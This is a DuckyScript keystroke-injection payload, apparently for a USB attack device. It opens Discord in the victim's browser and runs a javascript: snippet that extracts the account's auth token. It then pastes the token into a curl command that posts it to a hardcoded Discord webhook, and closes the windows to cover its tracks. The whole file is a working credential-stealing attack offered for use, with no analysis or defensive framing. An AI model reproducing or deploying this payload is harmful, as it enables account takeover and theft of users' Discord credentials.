DELAY 350
GUI r
DELAY 350
STRING https://discord.com/channels/@me
DELAY 350
ENTER 
DELAY 7000
CONTROL l
DELAY 500
STRING javascript:(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()
DELAY 500
ENTER 
DELAY 350
CONTROL a
DELAY 350
CONTROL c
DELAY 350
CONTROL w
DELAY 350
GUI r
DELAY 350
STRING cmd
DELAY 350
ENTER 
DELAY 1000
STRING curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"
DELAY 350
CONTROL v
DELAY 350
STRING \"}" https://discord.com/api/webhooks/996862834778570793/X3cb20jLNuQAw9svgJhNtYaAowzbyDDmpZeX6ektY_rOgg4AHdZlzAIaYwaqN0xtAHkI
DELAY 500
ENTER 
DELAY 450
ALT F4
